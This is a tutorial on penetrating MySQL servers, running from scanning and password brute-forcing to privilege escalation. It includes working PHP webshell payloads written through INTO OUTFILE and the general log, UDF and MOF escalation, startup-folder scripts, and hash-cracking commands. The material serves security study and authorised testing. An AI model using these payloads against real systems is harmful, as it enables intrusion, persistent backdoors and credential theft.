Master MySQL Penetration: From Recon to Privilege Escalation

1. MySQL Information Gathering

MySQL is one of the most widely used databases; common reconnaissance includes port scanning (default 3306) with tools like nmap -p 3306 192.168.1.1-254 or iisputter, version detection via Metasploit module auxiliary/scanner/mysql/mysql_version, direct SQL queries SELECT @@version, and sqlmap detection sqlmap.py -u url --dbms mysql. Management interfaces (phpMyAdmin, Navicat, MySQLFront) may expose configuration files containing credentials.

2. MySQL Password Acquisition

2.1 Brute‑Force Techniques

Common approaches include web‑based multi‑threaded cracking (Burp Suite, custom phpMyAdmin tools), Metasploit auxiliary/scanner/mysql/mysql_login with parameters such as RHOSTS, USERNAME, PASSWORD, and Nmap scripts --script=mysql-brute or --script=mysql-empty-password. Tools like hscan can also be used with custom dictionaries.

2.2 Source Code Leakage

Backup files (e.g., config.php, web.config, jdbc.properties) often contain database connection strings. Editing tools may leave .bak files, and local file inclusion vulnerabilities can reveal these configurations.

2.3 File Inclusion

Local file inclusion can be leveraged to read configuration files and extract usernames and passwords.

3. Obtaining Webshells via MySQL

Webshells can be written using SELECT ... INTO OUTFILE statements. Examples include creating a simple PHP backdoor:

SELECT '<?php @eval($_POST[antian365]);?>' INTO OUTFILE 'D:/work/WWW/antian365.php';

Other methods use LOAD_FILE to read existing backdoor files, or exploit CMS admin accounts (e.g., DedeCMS, phpCMS, Discuz!) to upload malicious PHP files. The general log can be abused to write a shell:

SET GLOBAL general_log='ON';
SET GLOBAL general_log_file='D:/phpStudy/WWW/cmd.php';
SELECT '<?php assert($_POST["cmd"]);?>';

Sqlmap can also drop a shell when write permissions are available.

4. Privilege Escalation Methods

4.1 MOF Exploits

MOF files can be compiled via Mofcomp.exe, the IMofCompiler interface, or dropped into %SystemRoot%\System32\Wbem\MOF. A sample MOF payload creates a user and adds it to the administrators group. The exploit requires MySQL root access to write the MOF file.

4.2 UDF Exploits

Custom User‑Defined Functions (UDFs) such as cmdshell, backshell, or sys_eval can be loaded from a DLL placed in the MySQL plugin directory. After creating the function, commands can be executed, e.g., SELECT sys_eval('whoami');. Cleanup involves dropping the function and removing the DLL.

4.3 Startup Script Exploits

By inserting VBS or batch scripts into a table and exporting them to the system startup folder (e.g.,

SELECT * FROM a INTO OUTFILE 'C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\iis.vbs';

), an attacker can create a new admin user on reboot.

5. Additional Exploits and Password‑Cracking Tools

Notable vulnerabilities include CVE‑2012‑2122 (MySQL authentication bypass). Metasploit modules such as auxiliary/scanner/mysql/mysql_authbypass_hashdump, exploit/windows/mysql/mysql_yassl_hello, and exploit/windows/mysql/mysql_start_up automate exploitation. Password‑cracking utilities include Cain, hashcat (e.g., hashcat64.exe -m 200 mysql.hash), and John the Ripper ( john --format=mysql-sha1 hashes.txt).